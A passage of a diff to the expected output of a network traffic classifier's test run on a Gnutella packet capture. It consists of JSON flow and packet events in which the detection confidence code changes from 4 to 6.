-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1106,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":91075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91075,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1106,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90740,"flow_last_seen":91075,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91075,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50294,"dst_port":37058,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1108,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":2,"flow_last_seen":91076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":91076,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsA9AAAEAGXEAOyP\/lCgACD7KOxHkAw1ABv2bicWAS\/\/8TtQAAAgQFtA=="} 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1110,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":3,"flow_last_seen":91076,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":91076,"pkt":"UlQAEjUCCAAn5uVZCABFAAAotiNAAIAGKfAKAAIPDsj\/5cR5so6\/ZuJxAMNQAlAQ+vAwgQAA"} 
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":91076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91076,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90741,"flow_last_seen":91076,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":150,"midstream":0,"thread_ts_msec":91076,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.200.255.229","src_port":50297,"dst_port":45710,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1185,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":241,"flow_packet_id":2,"flow_last_seen":91716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":91716,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QYNAAIAGx74KAAIPYteCnMRvMHWjnzXtAAAAAIAC+vC0KwAAAgQFtAEDAwgBAQQC"} 
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1186,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":240,"flow_packet_id":2,"flow_last_seen":91717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":91717,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0QNNAAIAG5KUKAAIPVHZ0xsRurkgo6JHMAAAAAIAC+vBxaAAAAgQFtAEDAwgBAQQC"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":92750,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":92750,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0nYJAAIAGGXYKAAIPSsPs+cRxSH3g2g3bAAAAAIAC+vA0rwAAAgQFtAEDAwgBAQQC"} 
@@ -1022,18 +1022,18 @@ 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":3,"flow_last_seen":94638,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":94638,"pkt":"UlQAEjUCCAAn5uVZCABFAAA03z1AAIAGuFYKAAIPRK4Sc8RixfcTIeyiAAAAAIAC+vCG0QAAAgQFtAEDAwgBAQQC"} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1222,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95216,"flow_last_seen":95216,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95216,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.201.208.57","src_port":28681,"dst_port":38617,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1222,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":95216,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95216,"pkt":"UlQAEjUCCAAn5uVZCABFAABtOX8AAIAR2+8KAAIPSMnQOXAJltkAWSBpTGIxAqnQz8i8hdkTM6c6p0QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1222,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95216,"flow_last_seen":95216,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95216,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.201.208.57","src_port":28681,"dst_port":38617,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1222,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95216,"flow_last_seen":95216,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95216,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"72.201.208.57","src_port":28681,"dst_port":38617,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1223,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95264,"flow_last_seen":95264,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":40137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1223,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":95264,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95264,"pkt":"UlQAEjUCCAAn5uVZCABFAABteh0AAIARB1oKAAIPUc1bLXAJnMkAWTuNUisxAvjRH\/hajsQp0x+4CkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1223,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95264,"flow_last_seen":95264,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":40137,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1223,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95264,"flow_last_seen":95264,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"81.205.91.45","src_port":28681,"dst_port":40137,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1224,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95264,"flow_last_seen":95264,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1224,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":95264,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95264,"pkt":"UlQAEjUCCAAn5uVZCABFAABtBMUAAIARP0QKAAIPL9y6jHAJa\/kAWcmWUFgxAsm+7Dhb\/+NPw\/hwmEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95264,"flow_last_seen":95264,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95264,"flow_last_seen":95264,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95264,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.220.186.140","src_port":28681,"dst_port":27641,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01410{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1225,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":2,"flow_last_seen":95411,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":95411,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBAUAAEARfX4v3LqMCgACD2v5cAkC33tEUFgxAsm+7Dhb\/+NPw\/hwmEQAAMACAAAGR1RLRwAAapTkMLTCnHtO3\/4C25AmQ4OUYisEL9y6jGv5AQAAAAR8wXsRFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtUw=="} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1226,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_packet_id":3,"flow_last_seen":95412,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95412,"pkt":"UlQAEjUCCAAn5uVZCABFAABtYpsAAIARi98KAAIPwSB+1nAJ6MwAWeiNeJExAmLu0Xk4X2RsSVj1uUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1228,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95443,"flow_last_seen":95443,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95443,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.240.69.199","src_port":28681,"dst_port":6348,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1228,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":95443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95443,"pkt":"UlQAEjUCCAAn5uVZCABFAABtP0UAAIARMnUKAAIPdvBFx3AJGMwAWTV1zcQxAjBRcglTz+ngOj6nIkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1228,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95443,"flow_last_seen":95443,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95443,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.240.69.199","src_port":28681,"dst_port":6348,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1228,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95443,"flow_last_seen":95443,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95443,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.240.69.199","src_port":28681,"dst_port":6348,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1230,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":3,"flow_last_seen":95653,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":95653,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0sx9AAIAG7QUKAAIPUrX72sRljhBQLtKuAAAAAIAC+vCkLQAAAgQFtAEDAwgBAQQC"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1231,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":3,"flow_last_seen":95653,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":95653,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vENAAIAGZKwKAAIPcfxbycRnEMmMdJG3AAAAAIAC+vCm7gAAAgQFtAEDAwgBAQQC"} 
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1232,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":3,"flow_last_seen":95653,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":95653,"pkt":"UlQAEjUCCAAn5uVZCABFAAA04CVAAIAGre0KAAIPJOc7u8Rm8xqBNdLHAAAAAIAC+vD77wAAAgQFtAEDAwgBAQQC"} 
@@ -1043,64 +1043,64 @@ 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1237,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":3,"flow_last_seen":95685,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95685,"pkt":"UlQAEjUCCAAn5uVZCABFAABtBMYAAIARP0MKAAIPL9y6jHAJa\/kAWT8LpTgxAh8vpCECmjOT1kHZjEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1239,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95715,"flow_last_seen":95715,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95715,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1239,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":95715,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95715,"pkt":"UlQAEjUCCAAn5uVZCABFAABtSkUAAIARukUKAAIPbYS8YnAJ9YMAWQnlOt4xAkt+phdWa3WZX\/1iLEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} 
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1239,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95715,"flow_last_seen":95715,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95715,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1239,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95715,"flow_last_seen":95715,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95715,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"109.132.188.98","src_port":28681,"dst_port":62851,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1240,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95716,"flow_last_seen":95716,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95716,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1240,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":95716,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":95716,"pkt":"UlQAEjUCCAAn5uVZCABFAABtyVMAAIARg0EKAAIPGKfJNXAJuLIAWdvQozIxAmeG11K2Zk+mg8cBskQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAONVJKmT8c3egN9Xa0CwzKQP3iGM"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1240,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":95716,"flow_last_seen":95716,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":95716,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.167.201.53","src_port":28681,"dst_port":47282,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
